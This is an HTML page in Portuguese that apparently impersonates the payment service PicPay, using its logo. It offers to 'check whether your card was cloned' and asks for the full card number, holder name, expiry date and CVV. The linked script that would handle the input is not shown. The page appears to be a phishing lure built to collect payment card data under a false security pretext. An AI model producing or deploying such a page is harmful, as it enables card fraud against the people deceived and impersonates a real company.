<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verificação de Clonagem de Cartão</title>
    <link rel="stylesheet" href="./stylePicPay.css">
    
</head>
<body>
    <img src="https://static.wikia.nocookie.net/logopedia/images/b/b5/Picpayicon.jpg/revision/latest/scale-to-width-down/250?cb=20181222023507" alt="PicPay">
    <h1>Verifique se seu Cartão foi clonado na internet</h1>
    <h1></h1>
    <h1>Digite os Dados do cartão:</h1>
    <h1></h1>
    <div class="container">
        <input type="text" placeholder="Número do Cartão" required>
        <input type="text" placeholder="Nome do Titular" required>
        <input type="text" placeholder="Validade (MM/AA)" required>
        <input type="text" placeholder="CVV" required>
        <button>Verificar</button>
    </div>
    <script src="scriptPicPay.js"></script>
</body>
</html>
